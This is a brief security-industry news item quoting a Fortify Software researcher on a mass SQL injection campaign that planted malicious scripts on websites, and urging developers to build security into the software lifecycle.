Innovative site developers to blame for the current crop of SQL Web server attacks

Security firm Fortify Software reports that this week's reports of a rash of SQL attacks on Web sites should make software developers sit up and take notice.

"Newswire reports suggest that hundreds of thousands of Web site have been hit by a mass SQL attack. This is symptomatic of hackers developing highly sophisticated and semi-automated attack routines," said Jacob West, Manager of Fortify’s Security Research Group.

West added that “The script or tool behind the attack uses Google to search for sites that include a file type and parameter that appear to often be susceptible to SQL injection and uses that list returned from Google to mount its attack.

The attack uses the SQL injection vulnerability to mount a persistent cross-site scripting attack that embeds malicious JavaScript/HTML in the vulnerable application and infects all visitors to the infected site until it is explicitly identified and removed.”

According to West, the current crop of SQL attacks appears to be the result of sloppy programming on the part of Web site developers.

"Although this wave of attacks targets an application vulnerability that is the result of poor programming, it is indicative of the larger problem that we in the software engineering and security fields need to provide developers with APIs that make getting security right easier and better tools and processes to ensure that the software they build with these APIs is secure.," he said.

West added “SQL injection is a straightforward problem to identify and avoid when compared with other code-level vulnerabilities, but these attacks demonstrate that some organizations building web applications today are still woefully behind the bad guys.

The solution to this and similar problems is a software development lifecycle designed to build security into software from the ground up. Security is a critical attribute during the design, building, testing and deployment phases. Software developed without a full-lifecycle approach and the right tools to support each phase is destined to suffer security compromises like the one seen here“